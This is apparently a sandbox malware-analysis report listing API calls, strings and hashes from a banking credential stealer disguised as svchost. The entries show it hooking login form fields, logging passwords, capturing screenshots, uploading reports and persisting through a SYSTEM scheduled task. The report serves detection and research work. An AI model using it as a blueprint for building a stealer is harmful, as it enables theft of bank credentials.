                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c41af,?,?,?,?,?,?), ref: 02CA8B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af,?,?,?,?,?,?), ref: 02CA8B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?,?), ref: 02CA8BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?,?), ref: 02CA8C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?,?), ref: 02CA8C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149,?,?,?,?,?,?), ref: 02CA8C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,A23C4149,?,?,?,?,?,?), ref: 02CA8C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4149,?,?,?,?,?,?), ref: 02CA8C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?,?), ref: 02CA8CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?,?,?,?,?), ref: 02CA8CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c4093,?,?,?,?,?,?), ref: 02CA8D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 02CA8D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?,?,?,?,?), ref: 02CA8D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?,?), ref: 02CA8D93
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?,?,?,?,?), ref: 02CA8DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,a23c4015,?,?,?,?,?,?), ref: 02CA8DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?,?,?,?,?), ref: 02CA8DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?,?), ref: 02CA8E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94,?,?,?,?,?,?), ref: 02CA8E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,02CECF94,?,?,?,?,?,?), ref: 02CA8E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CECF94,?,?,?,?,?,?), ref: 02CA8E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3570,00000000,00000000,00000000), ref: 02CA8EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,02CA0BE3,?,?,?,?,?,?), ref: 02CA8F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 02CA8F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$AdminAllocCloseInformationReadThreadUsermemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$A23C4149$A23C419D$CryptoPluginId=AGAVA&Sign$a23c4015$a23c4093$a23c41af$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02CA0981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0984
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02CA09BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA09DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA09E2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA09F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CA0A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02CA0A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02CA0A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02CA0A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0A4F
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02CA0A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 02CA0AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0ACC
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0AE0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0AF0
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA0AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA0B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA0B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA0B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02CA0BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA0C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA0C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA0C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 02CA2AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02CA2AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA2ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02CA2B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02CA2B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA2B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02CA2BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02CA2BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA2BED
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,02CDFB50,00000000), ref: 02CA2C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02CA2C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA2C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02CA2C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 02CA2C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA2C8B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02CA2D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 02CA2D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 02CA2D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 02CA2D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA2D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CDFB50), ref: 02CA2DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA2DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02CDFB50), ref: 02CA2DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA2DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA2DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB50), ref: 02CA2DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA2E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02CA2E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 02CA2E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02CA2E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 5DD2BF7Da$5dd2bfbfa$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-2570866807
                                                                                                                                                                                                              • Opcode ID: 522a45eb1158a1b1af0c2217603e7d39ebdd3c424979d0033cb7b63e7b461d08
                                                                                                                                                                                                              • Instruction ID: 88c3f9fbfc6d875f8f81f80ab34452360c4e7f0b9b4cccaf3e8bff5c7aa6ba7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 522a45eb1158a1b1af0c2217603e7d39ebdd3c424979d0033cb7b63e7b461d08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7C10931645316AFE7209F649C59FAB77ECEF88748F444A18F986DB180DB70D908C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CA3BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CA3C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA3C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA3C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA3CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CA3CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CA3CD6
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 02CA3D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$61de29337166780$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              • API String ID: 3203035732-1310954842
                                                                                                                                                                                                              • Opcode ID: e536497e0687b87f67d7204e387ab6dab1d7534e521696a1a9cb42836199a25e
                                                                                                                                                                                                              • Instruction ID: f2eeff180ef182c6e0a0617faa52d65a8343e90967a5a0cfde884922797d00cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e536497e0687b87f67d7204e387ab6dab1d7534e521696a1a9cb42836199a25e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F117319046879BCF258F309CB5BFBBBA6AF85348F4445C4ED869B241DB729A09C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • p=<u, xrefs: 0040394B
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1711019342
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 02CA2053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02CA2064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 02CA2079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02CA208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 02CA20A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02CA20D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 02CA20EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 02CA215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA216F
                                                                                                                                                                                                              • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02CA218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(02CA255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02CA21A6
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentThread.KERNEL32 ref: 02CB5940
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5947
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetCurrentProcess.KERNEL32(00000020,02CA4D1B,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB5957
                                                                                                                                                                                                                • Part of subcall function 02CB5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02CA4D1B,?,?,00000000), ref: 02CB595E
                                                                                                                                                                                                                • Part of subcall function 02CB5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02CB5981
                                                                                                                                                                                                                • Part of subcall function 02CB5930: AdjustTokenPrivileges.KERNELBASE(02CA4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02CB599B
                                                                                                                                                                                                                • Part of subcall function 02CB5930: GetLastError.KERNEL32 ref: 02CB59A5
                                                                                                                                                                                                                • Part of subcall function 02CB5930: FindCloseChangeNotification.KERNEL32(02CA4D1B), ref: 02CB59B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CA21CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02CA21EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(02CA255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02CA2209
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02CA2214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02CA224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02CA2260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02CA2270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02CA228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02CA22A3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02CA22B3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02CA22CC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02CA22DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02CA22EE
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02CA22FD
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 02CA2308
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 02CA230F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA2323
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2335
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02CA2340
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 02CA234C
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02CA2358
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorObjectPointerTokenWrite$CloseCompatibleCurrentFreeHandleOpenProcessReleaseThread$AdjustAllocBitmapBitsChangeConvertCursorDeleteErrorFindInfoInformationLastLocalLookupNamedNotificationPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                              • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2969484848-808120212
                                                                                                                                                                                                              • Opcode ID: 1fd3ef3a37a0a098f9bdcebd1eb11bccaab350d1d40fc574b15b9766c6510c4f
                                                                                                                                                                                                              • Instruction ID: 6f406e7f2c6703d24647b9acff6b923ceb93f0d6a6eccb2c7cd4e158642ba9fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fd3ef3a37a0a098f9bdcebd1eb11bccaab350d1d40fc574b15b9766c6510c4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B913AB1546311AFE3109F64DC88F6BBBADEFC9785F404A1DF685D2240D77099058BA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAF9E8
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CEDDC8,00000000), ref: 02CAFA29
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFA2F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFA37
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CEDDC8), ref: 02CAFA46
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFA4D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(02CEDDC8,00000000), ref: 02CAFA89
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(02CEDDC8), ref: 02CAFA94
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015,?,?), ref: 02CAFAD6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CED998,00000000), ref: 02CAFB11
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFB17
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFB1F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CED998), ref: 02CAFB2E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFB35
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(02CED998,00000000), ref: 02CAFB63
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAFB69
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAFB71
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(02CED998), ref: 02CAFB80
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAFB87
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAFB91
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAFBC7
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 02CAFC41
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFC52
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02CAFC6F
